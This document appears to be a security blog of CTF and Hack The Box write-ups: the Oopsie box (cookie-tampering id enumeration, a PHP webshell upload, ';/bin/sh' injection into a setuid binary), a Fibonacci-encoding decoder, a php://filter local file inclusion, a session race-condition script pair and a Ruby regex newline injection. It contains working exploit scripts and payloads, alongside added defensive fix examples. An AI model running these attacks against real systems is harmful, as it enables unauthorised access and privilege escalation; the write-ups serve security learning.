
Saturday, 28 August 2021

[HTB] Oopsie

Nmap showed two open ports, 22 (SSH) and 80 (HTTP).

$ sudo nmap -PS -sS 10.10.10.28 -sC

Nmap scan report for 10.10.10.28
Host is up (0.68s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http
|_http-title: Welcome


The home page had no login form or any other interactive feature.

Viewing the page source, however, exposed two additional paths:
1. /cdn-cgi/login/login.php
2. /uploads/

The second one matters later, once a file can be uploaded.

/cdn-cgi/login/login.php was a login page. The credentials admin / "MEGACORP_4dm1n!!" worked; the password was reused from the previous box.

After login the application set two cookies, user=34322 and role=admin, and showed a few menus. The Uploads menu was refused with "This action require super admin rights".

Authorization is decided entirely from the client-supplied cookies, so the super admin can be found by keeping role=admin and enumerating the user id:

import requests

HOST = "http://10.10.10.28"
URL = HOST + "/cdn-cgi/login/admin.php?content=uploads"


def exp():
    # Walk the user id with role=admin left in place. A rejected request
    # comes back with "Authenticating" in the body (the marker the original
    # check relied on); its absence means the id unlocks the Uploads menu.
    for i in range(86574, 100000):
        cookies = {"user": str(i), "role": "admin"}
        r = requests.get(URL, cookies=cookies)
        if "Authenticating" not in r.text:
            print(f"Found: {i}")
            return i
    return None


if __name__ == "__main__":
    exp()
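The loop above works because the server believes whatever user id the client sends. As an added example (not code from the box or from the original post), the check below shows the same cookie-based authorization in its trusting form next to a form that binds the user id and role to a server-side HMAC, so changing only the user id is detected. The super admin id 99999 and the secret are constructed values, not the ones on the box.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; it never leaves the server.
SECRET = secrets.token_bytes(32)


def parse_cookie(cookie: str) -> dict:
    """Turn 'user=34322; role=admin; sig=...' into a dict, order preserved."""
    parts = {}
    for item in cookie.split(";"):
        key, _, value = item.strip().partition("=")
        parts[key] = value
    return parts


def sign_cookie(user_id: int, role: str, secret: bytes = SECRET) -> str:
    """Issue a cookie whose user id and role are covered by an HMAC-SHA256 tag."""
    payload = f"{user_id}|{role}".encode()
    sig = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    return f"user={user_id}; role={role}; sig={sig}"


def verify_cookie(cookie: str, secret: bytes = SECRET):
    """Return (user_id, role) when the tag matches, otherwise None."""
    c = parse_cookie(cookie)
    try:
        user_id = int(c["user"])
        payload = f"{user_id}|{c['role']}".encode()
        sig = c["sig"]
    except (KeyError, ValueError):
        return None
    expected = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):   # constant-time comparison
        return None
    return user_id, c["role"]


def unsigned_is_super_admin(cookie: str, super_admin_id: int) -> bool:
    """The Oopsie-style check: trusts the client's user and role fields outright."""
    c = parse_cookie(cookie)
    return c.get("role") == "admin" and c.get("user") == str(super_admin_id)


def signed_is_super_admin(cookie: str, super_admin_id: int) -> bool:
    """Same decision, but only after the HMAC has vouched for the fields."""
    verified = verify_cookie(cookie)
    return verified is not None and verified == (super_admin_id, "admin")


def tamper(cookie: str, new_user_id: int) -> str:
    """What the enumeration loop does: rewrite only the user id."""
    c = parse_cookie(cookie)
    c["user"] = str(new_user_id)
    return "; ".join(f"{k}={v}" for k, v in c.items())
```

A signed cookie stops id tampering, but the cleaner design keeps only an opaque session id in the cookie and looks the user and role up server-side on every request; the signed variant is shown because it maps one-to-one onto the cookie the box actually issues.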
  

The loop found the user id that unlocks the Uploads menu.

With upload access I generated a PHP webshell with weevely and uploaded it; it was reachable under /uploads/, the directory noted earlier.

Reading files through the webshell turned up a user account and password.

The credentials belonged to robert and worked over SSH, which gave the user flag.

Next came root. After a few minutes of enumeration an unusual group, bugtracker, stood out.

Listing files owned by that group pointed at a single binary, /usr/bin/bugtracker:
- find / -type f -group bugtracker 2>/dev/null

The binary runs with root privileges.

It hands the supplied input to a shell, so entering ";/bin/sh" at its prompt spawned a root shell.
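Why ";/bin/sh" works: the id is pasted into a command line that a shell interprets, so a separator ends the intended command and starts a new one. The example below is added here and is not the bugtracker binary's code; it assumes the original builds a command of the shape "cat <reports dir>/<id>", which the page does not show. It puts that pattern next to a version that validates the id and never goes through a shell, over a constructed report directory.

```python
import os
import re
import subprocess
import tempfile


def make_reports_dir() -> str:
    """Constructed fixture standing in for the binary's report directory."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "1"), "w") as f:
        f.write("report one\n")
    return d


def lookup_vulnerable(reports_dir: str, bug_id: str) -> str:
    # Assumed shape of the original: the id is interpolated into a shell
    # command line, so ';', '|', '$(...)' and friends all reach /bin/sh.
    cmd = f"cat {reports_dir}/{bug_id}"
    r = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return r.stdout


def lookup_fixed(reports_dir: str, bug_id: str) -> str:
    # Allowlist the id (digits only: this also rules out '../' traversal),
    # then execute cat directly with an argument vector, no shell involved.
    if not re.fullmatch(r"[0-9]+", bug_id):
        raise ValueError("bug id must be numeric")
    path = os.path.join(reports_dir, bug_id)
    r = subprocess.run(["cat", path], capture_output=True, text=True)
    return r.stdout
```

Even the fixed version should not be setuid root: a lookup tool that only needs to read one directory can run as an unprivileged user that owns that directory, which is the least-privilege fix regardless of how the command is built.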


END

Tuesday, 24 August 2021

corCTF - writeup for crypto/fibinary

A simple crypto challenge.

It provides the encoder below and the encoded flag:

enc.py

fib = [1, 1]
for i in range(2, 11):
        fib.append(fib[i - 1] + fib[i - 2])

def c2f(c):
        n = ord(c)
        b = ''
        for i in range(10, -1, -1):
                if n >= fib[i]:
                        n -= fib[i]
                        b += '1'
                else:
                        b += '0'
        return b

flag = open('flag.txt', 'r').read()
enc = ''
for c in flag:
        enc += c2f(c) + ' '
with open('flag.enc', 'w') as f:
        f.write(enc.strip()) 

flag.enc

10000100100 10010000010 10010001010 10000100100 10010010010 10001000000 10100000000 10000100010 00101010000 10010010000 00101001010 10000101000 10000010010 00101010000 10010000000 10000101000 10000010010 10001000000 00101000100 10000100010 10010000100 00010101010 00101000100 00101000100 00101001010 10000101000 10100000100 00000100100  

There is no key here: c2f is a deterministic encoding of each character into an 11-bit greedy Fibonacci (Zeckendorf-style) representation, and every character is encoded independently. So a brute force over the ASCII range, one block at a time, recovers the flag:

dec.py

fib = [1, 1]
for i in range(2, 11):
        fib.append(fib[i - 1] + fib[i - 2])

# same encoder as enc.py
def c2f(c):
        n = ord(c)
        b = ''
        for i in range(10, -1, -1):
                if n >= fib[i]:
                        n -= fib[i]
                        b += '1'
                else:
                        b += '0'
        return b


flag_enc = open('flag.enc', 'r').read()

# for each block, find the ASCII character that encodes to it
dec = ''
for flag_blk in flag_enc.split(' '):
    for c in range(0, 127):
        if c2f(chr(c)) == flag_blk:
            dec += chr(c)
print(dec)


Flag:
corctf{b4s3d_4nd_f1bp!113d}

Tuesday, 7 January 2020

WhiteHat Grand Prix 06 – Quals, CTF writeup, Web Security 1

In the task, I got a website with register, login, logout forms. The web site redirected to:

  • http://15.165.80.50/?page=login 
  • http://15.165.80.50/?page=logout 

After a while I figured out that the page parameter was vulnerable to local file inclusion. With the php://filter wrapper the included file is base64-encoded before it reaches include, so PHP source comes back as text instead of being executed. For example:

  • http://15.165.80.50/?page=php://filter/convert.base64-encode/resource=/etc/passwd 

Reading the application's own files such as index.php with this payload did not work, and guessing paths and file names for the web files and the flag cost a lot of time.

Files under /proc were readable, though. /proc/1/cmdline is the command line of PID 1, the process that started the service, and here it carried the flag as an argument.

$ curl http://15.165.80.50/?page=php://filter/convert.base64-encode/resource=/proc/1/cmdline -o a.txt
$ cat a.txt

<!DOCTYPE html>
<html lang="en">
<head>
<title>My Viet Nam</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>
<style type="text/css">
body{ font: 14px sans-serif; }
.wrapper{ width: 350px; padding: 20px; }
</style>
</head>
<body>

<nav class="navbar navbar-inverse">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="/">My Viet Nam</a>
</div>

<ul class="nav navbar-nav">
<li class="active"><a href="/">Home</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li><a href="?page=register"><span class="glyphicon glyphicon-user"></span> Register</a></li>
<ll><a href="?page=login"><span class="glyphicon glyphicon-log-in"></span> Login</a></li>
</ul>
</div>
</nav>/bin/bash/bin/start_service WhiteHat{Local_File_Inclusion_bad_enough_??}

The flag was WhiteHat{Local_File_Inclusion_bad_enough_??}. The three arguments of PID 1 appear run together because /proc/<pid>/cmdline separates them with NUL bytes, which the terminal does not display.
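The two mechanical steps of this attack, building the php://filter URL and pulling the included file out of the page that wraps it, are worth having as a helper. The code below is an added example, not the challenge's or the original post's code; it assumes the standard php://filter behaviour, where the response is the HTML template followed by a base64 blob (the output shown above is already in clear text), and it splits /proc/<pid>/cmdline on NUL so the arguments come back as a list. The response body is constructed, not captured from the CTF server.

```python
import base64
from urllib.parse import quote


def filter_payload(base_url: str, path: str) -> str:
    """URL that makes the vulnerable include return `path` base64-encoded."""
    return (f"{base_url}/?page=php://filter/convert.base64-encode/"
            f"resource={quote(path, safe='/')}")


def extract_included(body: str, marker: str = "</nav>") -> bytes:
    """Drop the page template (everything up to the last `marker`) and
    base64-decode what the include appended after it."""
    idx = body.rfind(marker)
    blob = body[idx + len(marker):] if idx != -1 else body
    blob = "".join(blob.split())          # strip newlines/whitespace around the blob
    return base64.b64decode(blob, validate=True)


def parse_cmdline(raw: bytes) -> list:
    """/proc/<pid>/cmdline is NUL-separated with a trailing NUL."""
    return [arg.decode(errors="replace") for arg in raw.split(b"\0") if arg]


# Constructed response: template prefix plus the base64 of a made-up cmdline.
SAMPLE_CMDLINE = b"/bin/bash\0/bin/start_service\0FLAG{constructed}\0"
SAMPLE_BODY = ("<html><body><nav>...</nav>"
               + base64.b64encode(SAMPLE_CMDLINE).decode() + "\n")

if __name__ == "__main__":
    print(filter_payload("http://15.165.80.50", "/proc/1/cmdline"))
    print(parse_cmdline(extract_included(SAMPLE_BODY)))
```

The marker approach only works when the include is the last thing the template emits, as it is on this page; if a footer follows the include, cut on the footer's opening tag instead.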


Monday, 15 April 2019

PlaidCTF 2019 - Triggered (Web)

I was not able to solve this problem during the contest. Someone posted a hint on Twitter (Link#) and I solved it following that post, but it had no details, so I wrote the code and found the flag as below:

Problem Description

Triggered - Web (280 pts)

I stared into the abyss of microservices, and it stared back. I found something utterly terrifying about the chaos of connections.

"Screw this," I finally declared, "why have multiple services when the database can do everything just fine on its own?"

And so on that glorious day it came to be that everything ran in plpgsql.

Write up

The bug is a race condition, so the two scripts below have to run at the same time.

First Code:

import requests

BASE = "http://triggered.pwni.ng:52856"
COOKIES = {"session": "5f129555-dafb-4feb-b1c6-472d260a8d3b"}  # your session


def request_post(url, cookies, data):
    r = requests.post(url, cookies=cookies, data=data)
    # A search page that greets "admin" means the session now belongs to
    # the admin user and the notes returned are the admin's.
    if r.url == BASE + "/search" and "Hey there, admin" in r.text:
        print(r.text)
        print("[-] Result: Found out!")
        raise SystemExit
    return r


def signin(cookies):
    # Login is split into two requests: username first, then password.
    request_post(BASE + "/login", cookies, {"username": "searchtheflag"})
    request_post(BASE + "/login/password", cookies, {"password": "test"})
    print("[-] Sign-in: Okay")


if __name__ == "__main__":
    signin(COOKIES)
    while True:
        r = request_post(BASE + "/search", COOKIES, {"query": "flag"})
        print("[-] Search: in progress")
        if r.url == BASE + "/login":
            # bounced back to the login page: sign in again
            signin(COOKIES)

Second Code:

import requests

BASE = "http://triggered.pwni.ng:52856"
COOKIES = {"session": "5f129555-dafb-4feb-b1c6-472d260a8d3b"}  # your session


def signin_admin(cookies):
    # Keep posting username=admin on the same session while the first
    # script is in the middle of its two-step login.
    requests.post(BASE + "/login", cookies=cookies, data={"username": "admin"})


if __name__ == "__main__":
    while True:
        signin_admin(COOKIES)

Result & Flag:


[-] Sign-in: Okay
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
<html>
<head>
    <link rel="stylesheet" href="/static/styles.css" />
    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,400i,700,700i,900,900i" rel="stylesheet">
</head>
<body>
    <header>
        <a href="/" class="left">
            <h1>pgNotes</h1>
            <h2>Let's keep it PG, ok?</h2>
        </a>
        <div class="right">

                <nav>
                    <div class="welcome">Hey there, admin</div>
                    &middot;
                    <a href="/search">Search notes</a>
                    &middot;
                    <a href="/note/new">New note</a>
                    &middot;
                    <a href="/logout">Logout</a>
                </nav>

        </div>
    </header>
    <main>
<section class="search-input">
    <h3>Search</h3>
    <form method="POST" action="/search">
        <div class="input">
            <label>Query</label>
            <input type="text" name="query" />
        </div>
        <div class="input submit">
            <input type="submit" />
        </div>
    </form>
</section>

    <section class="search-query">
        Results for <span class="query">flag</span>
    </section>


            <section class="note">
    <section class="header">
        <h4>Flag</h4>
        <div class="author">admin</div>
        <div class="date">02:44pm on April   13, 2019</div>
    </section>
    <section class="content">
        <p>
            PCTF{i_rAt3_p0sTgRE5_1O_oUT_0f_14_pH_n3ed5_m0Re_4Cid}
        </p>
    </section>
</section>

            <section class="note">
    <section class="header">
        <h4>flag</h4>
        <div class="author">admin</div>
        <div class="date">08:11am on April   14, 2019</div>
    </section>
    <section class="content">
        <p>
            PCTF{cr4zy_70_m4k3_w3b_4ppl1c4710n_w17h_plp65ql}
        </p>
    </section>
</section>

            <section class="note">
    <section class="header">
        <h4>flag</h4>
        <div class="author">admin</div>
        <div class="date">04:51pm on April   14, 2019</div>
    </section>
    <section class="content">
        <p>
            PCTF{PsQl_w3bs3rv3rf0rh1pst3r_l0l}
        </p>
    </section>
</section>

            <section class="note">
    <section class="header">
        <h4>Flag</h4>
        <div class="author">admin</div>
        <div class="date">06:55pm on April   14, 2019</div>
    </section>
    <section class="content">
        <p>
            PCTF{pGn0Te2_Lets_k22P_1t_PG_oK}
        </p>
    </section>
</section>



    </main>
</body>
</html>
[-] Result: Found out!

Thanks @gP4yload

Monday, 22 February 2016

Internetwache 2016 EXP50 Writeup



The server at 188.166.133.53:12037 greets with "Let me count the ascii values of 10 characters:".
Sending plain text such as "test" returns an error:
"WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !"

The check is a Ruby regex anchored with ^ and $. In Ruby those anchor to the start and end of a line, not of the whole string (\A and \z do that), so an input whose second line is ten letters a-f passes the filter while the first line is never inspected. Sending "ls" on the first line returned the flag:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('188.166.133.53', 12037))

print(s.recv(1024).decode())
print(s.recv(1024).decode())
# second line satisfies /^[a-f]{10}$/ on its own; the first line is free
s.send(b'ls\naaaaaaaaaa')
print(s.recv(1024).decode())
s.close()

The server's response:

$ python test.py
Let me count the ascii values of 10 characters:


Sum is: 1203
IW{RUBY_R3G3X_F41L}


FLAG:
IW{RUBY_R3G3X_F41L}
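The anchor pitfall is easy to reproduce without the server. The block below is an added example, not the challenge's code (which was never published on this page): it emulates Ruby's default ^/$ line-anchor semantics with Python's re.MULTILINE, puts Python's own weaker pitfall next to it ($ still matches before a trailing newline), and shows the whole-string check that closes both. The sum helper reproduces the "Sum is: 1203" the server printed, which confirms it summed all 13 bytes of the input, first line included.

```python
import re

PATTERN = r"^[a-f]{10}$"


def check_ruby_style(s: str) -> bool:
    """Ruby's ^ and $ are line anchors, so any single line may satisfy the
    pattern; re.MULTILINE gives Python the same behaviour for the comparison."""
    return re.search(PATTERN, s, re.MULTILINE) is not None


def check_python_default(s: str) -> bool:
    """Python's ^ is the string start, but $ also matches just before a final
    newline, so 'aaaaaaaaaa\\n' slips through."""
    return re.match(PATTERN, s) is not None


def check_strict(s: str) -> bool:
    """Whole-string match: re.fullmatch in Python, \\A[a-f]{10}\\z in Ruby."""
    return re.fullmatch(r"[a-f]{10}", s) is not None


def ascii_sum(s: str) -> int:
    """What the service claims to do with the input."""
    return sum(ord(c) for c in s)


if __name__ == "__main__":
    payload = "ls\naaaaaaaaaa"
    print(check_ruby_style(payload), check_python_default(payload), check_strict(payload))
    print(ascii_sum(payload))   # matches the server's "Sum is: 1203"
```

When validating untrusted input with a regex, anchor it to the whole string (\A and \z in Ruby, fullmatch in Python) and reject anything containing a newline before it reaches code that treats lines as commands.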

Reference:
http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html